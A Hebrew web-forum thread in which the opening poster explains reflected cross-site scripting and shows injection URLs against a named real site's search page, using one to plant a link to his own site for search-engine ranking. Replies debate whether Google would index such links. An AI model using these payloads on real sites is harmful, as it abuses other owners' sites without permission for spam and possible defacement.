![]() |
ניצול XSS לשם קידום
XSS/CSS - Cross site scripting
למי שלא יודע זה באג אבטחה מאוד נפוץ. הוא מאפשר "לתוקף" להכניס קוד HTML/JS (או כל קוד אחר שרץ על הלקוח) למעטפת האתר. למשל ניצול של XSS בתפוז - קוד:
http://www.tapuz.co.il/search/search.asp?q=</title><h1>xss</h1> פשוט מאוד - במידה ונכניס למעטפת האתר קוד HTML שיוצר לינק לאתר שלנו, נרוויח קישור מאתר כמו תפוז. למשל אם אני יכניס קישור באתר שלי לקוד הבא - קוד:
http://www.tapuz.co.il/search/search.asp?q=</title><a href="http://www.thereisnosite.co.il/">Google Seo</a> עוד דבר נחמד רק שלא ממש קשור ל XSS זה החיפושים של Google באתרים שונים. כמו למשל זה שנמצא באתר icq.com - קוד:
http://www.icq.com/search/ קוד:
http://www.icq.com/search/results.php?q=site:www.petnet.co.il למידע נוסף על XSS קרדיט לגרג (KGen) שחשב על הרעיון. |
אהבתי, אבל לדעתי ירחיקו אותך עוד כמה שעות כי זה קשור להאקינג.
|
כמובן, בגלל זה באתר שאני מפתח כרגע לדוגמא הצבתי הגנות כנגד XSS מכל הסוגים שאני מכיר \ קראתי.
|
רגע, אבל גוגל לא מתייחס לעמודים שדברים כמו זה - id= או search=
|
דבר אחד ששכחת, צריך לאנדקס את הקישור הזה על מנת שגוגל יבקר בו, קישור אחד או אפילו כמה לאותו עמוד לא יחזקו אותו (אפילו שהוא תחת הדומיין של תפוז)
|
התיחסתי לזה שכתבתי "אם נשתיל קישור כזה באתר שלנו", כניראה שזה לא היה מספיק ברור.
|
אוי סליחה, באמת נשמע יותר הגיוני....
|
כל הזמנים הם GMT +2. הזמן כעת הוא 23:52. |
מופעל באמצעות VBulletin גרסה 3.8.6
כל הזכויות שמורות ©
כל הזכויות שמורות לסולל יבוא ורשתות (1997) בע"מ